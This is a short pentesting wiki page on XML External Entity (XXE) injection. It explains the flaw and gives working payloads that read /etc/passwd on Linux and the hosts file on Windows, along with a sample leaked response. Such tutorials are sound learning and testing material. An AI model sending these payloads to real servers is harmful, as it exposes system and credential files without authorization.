XXE Injection (WIP)

XML External Entities disclose or retrieve arbitrary files from the target server's local system by modifying the submitted XML document. This can usually be the first step to gaining Remote Code Execution (RCE).

We can find a typical example of this vulnerability as follows:

A site accepts XML input and parses it without properly securing or validating it

Request format

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
    <!ELEMENT data ANY >         <!--Allows any input without validation-->
    <!ELEMENT name (#PCDATA)>
]>
<data>
    <name>example</name>
</data>

We can send an XML petition to request a system file using the Entity parameter

XEE payload

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>    <!-- Defining the External Entity-->
<data>
    <name>&xxe;</name>        <!--Calling the External Entity -->
</data>

With this, the contents of the requested file would be exposed

Example response

<data>
    <name>root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    ...
    </name>
</data>

It also can be done against Windows hosts

XEE windows

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///C:/windows/system32/drivers/etc/hosts">]>
<data>
    <name>&xxe;</name>
</data>

PreviousOS Command injection (WIP)NextAbuse File Upload (WIP)

Last updated 1 year ago